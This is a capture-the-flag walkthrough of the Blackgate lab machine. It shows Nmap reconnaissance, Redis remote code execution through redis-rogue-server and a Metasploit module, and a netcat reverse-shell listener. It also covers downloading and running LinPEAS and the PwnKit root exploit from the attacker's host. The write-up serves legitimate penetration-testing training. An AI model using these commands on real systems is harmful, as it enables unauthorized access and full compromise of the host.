Blackgate

Initial Reconnaissance

We kick things off with an Nmap scan to gather intel on the target system. This helps us identify which TCP ports are open and what services are running on them. We’re scanning all 65,535 ports to ensure we don’t miss anything.

sudo nmap -Pn -n 192.168.113.176 -sC -sV -p- --open -v

Here’s what each flag means for beginners:

• Pn: Skip host discovery (treat target as online).
• n: Don’t resolve DNS names.
• sC: Run default scripts (for basic checks).
• sV: Try to detect service versions.
• p-: Scan all 65535 TCP ports.
• -open: Show only open ports.
• v: Verbose output.

Nmap Results:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.3p1 Ubuntu 1ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 37:21:14:3e:23:e5:13:40:20:05:f9:79:e0:82:0b:09 (RSA)
|   256 b9:8d:bd:90:55:7c:84:cc:a0:7f:a8:b4:d3:55:06:a7 (ECDSA)
|_  256 07:07:29:7a:4c:7c:f2:b0:1f:3c:3f:2b:a1:56:9e:0a (ED25519)
6379/tcp open  redis   Redis key-value store 4.0.14
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Two services are accessible:

• SSH (port 22), which is standard but locked down unless we have valid credentials.
• Redis (port 6379), a database/cache often found in dev environments. This one might be misconfigured.

The SSH service likely won't help us without a valid username/password, so Redis becomes our main target.

Redis is an in-memory key-value store that can be used as a cache, database, or message broker. If it’s not properly secured, we may be able to exploit it.

For more details, check the HackTricks page on Redis exploitation: https://book.hacktricks.wiki/en/network-services-pentesting/6379-pentesting-redis.html

Gaining a Foothold via Redis

Let’s try remote code execution using a known Redis technique. We’ll use a tool called redis-rogue-server, which tricks Redis into loading a malicious module that gives us a shell.

Clone the exploit:

git clone https://github.com/n0b0dyCN/redis-rogue-server.git
cd redis-rogue-server

Start a listener on on Kali (port 445):

sudo rlwrap nc -nvlp 445

Run the exploit to trigger a reverse shell:

./redis-rogue-server.py --rhost=192.168.113.176 --rport=6379 --lhost=192.168.45.200 --lport=445

We get a reverse shell but it drops as soon as we enter a command. That’s not ideal.

Try the Metasploit alternative:

Alternative method is to use exploit/linux/redis/redis_replication_cmd_exec module on Metasploit:

sudo msfconsole -q
use exploit/linux/redis/redis_replication_cmd_exec
set RHOSTS 192.168.113.176
set SRVHOST 192.168.45.200
set LHOST 192.168.45.200
run

This method successfully gives us a Meterpreter session.

Get an interactive shell by running:

shell

We’re logged in as the user prudence.

Upgrade to a more stable bash shell by running:

which python3
python3 -c 'import pty;pty.spawn("/bin/bash")'

User Flag

The user flag is located in the prudence’s home directory.

cat local.txt

Privilege Escalation

Check for sudo permissions by running:

sudo -l

This shows that the user prudence can run /usr/local/bin/redis-status as root without a password. However, this binary doesn’t seem directly exploitable (no command injection or writable paths). GTFOBins confirms Redis isn't helpful here either: https://gtfobins.github.io/gtfobins/redis/

We take a look at the notes in prudence’s home directory:

cat notes.txt

This reveals something about Redis protected mode, which only allows connections from 127.0.0.1. That means Redis can only be accessed from the local machine unless that setting is disabled.

No clear privilege escalation path here, so let’s try a more automated approach.

LinPEAS - PrivEsc Enumeration

Use LinPEAS to look for misconfigurations, outdated software, or known vulnerabilities.

Serve LinPEAS from Kali:

python3 -m http.server 80

On target, download LinPEAS and change it to executable mode:

wget http://192.168.45.200/linpeas.sh -O linpeas.sh
chmod +x linpeas.sh

Run LinPEAS:

./linpeas.sh

LinPEAS suggest several Linux exploits:

LinPEAs freezes after this point.

We will background the current shell and open another shell session using Meterpreter.

Exploiting with PwnKit

We’ll try exploiting a local privilege escalation bug using PwnKit, a well-known exploit for the pkexec vulnerability. On Kali:

git clone https://github.com/ly4k/PwnKit

Copy PwnKit.sh to the directory where your HTTP server is being hosted and download it on the target. Change the mode to execution:

wget http://192.168.45.200/PwnKit.sh -O PwnKit.sh
chmod +x PwnKit.sh

Run the exploit on target:

./PwnKit.sh

Boom - we are now root!

Root Flag

The root flag proof.txt can be obtained from the root directory

cat /root/proof.txt

References

• https://medium.com/@gleasonbrian/offsec-proving-grounds-blackgate-writeup-49920d4188de
• https://medium.com/@SxEl/proving-grounds-blackgate-walkthrough-8efd1d9c6de